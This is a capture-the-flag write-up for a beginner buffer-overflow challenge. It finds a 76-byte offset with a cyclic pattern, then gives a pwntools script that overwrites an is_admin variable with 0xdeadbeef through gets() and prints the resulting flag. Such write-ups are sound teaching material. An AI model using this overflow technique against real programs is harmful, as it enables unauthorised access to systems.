Difficulty
baby
Categories
pwn
Description

This program asks for a password. There’s a variable called is_admin that needs to equal 0xdeadbeef to get the flag. The program uses gets(), which is vulnerable to buffer overflow.

Access: Connect to the binary with ncat --ssl [host] [port] or use pwntools.

The web interface provides educational content and downloadable source code.

Author
xnull
Service
Challenge has a remote instance.

Scenario

We can enter a password:

===== Secure Login System =====
Enter password: 11111
Access denied. is_admin = 0x0

Solution

We’ll first check where it breaks:

$ cyclic 512
$ ncat --ssl <url> 31337
==== Secure Login System =====
Enter password: <cyclic output>
Access denied. is_admin = 0x61616174
$ cyclic -l 0x61616174
76

Now we know we have to inject this at positionn 76:

from pwn import *
r = remote('b7df12de-6ec5-493c-9bde-835b1c1042fa.challs.qualifier.swiss-hacking-challenge.ch', 31337, ssl=True)
r.sendline(b"A"*76+p64(0xdeadbeef))
r.interactive()

Flag:

dach2026{el_buffer0_1s_full_of_AAAAAAAAAAAAA_678fb71c12bc}